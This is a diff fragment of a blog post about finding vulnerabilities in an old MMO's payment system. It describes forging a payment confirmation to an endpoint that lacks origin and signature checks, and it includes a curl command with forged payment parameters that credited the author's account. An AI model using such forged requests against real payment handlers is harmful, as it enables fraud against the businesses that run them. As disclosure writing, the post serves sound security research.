alecmaly/blog/_posts/2021/2021-11-12-Finding-Vulnerabilities-in-an-18-Year-Old-MMO.md

 So, to continue on, I then sent a POST request to `http://www.business.url/confirm_payment.php` with the 46 parameters and my account was credited.
 They do not validate that the request came from paypal.com and there is no signature validation!

-After some tinkering, I parsed the payload down to something like this.
-In an attempt to trim the personal data and keep the request as clean as possible.
+After some tinkering, I parsed the payload down in an attempt to trim the personal data and keep the request as clean as possible.

 ```text
 curl -XPOST http://www.business.url/confirm_payment.php -d 'mc_gross=500.00&payment_status=Completed&option_selection1=76543&mc_currency=USD&item_number=business-1&receipt_id=1234-5678-9101-2131'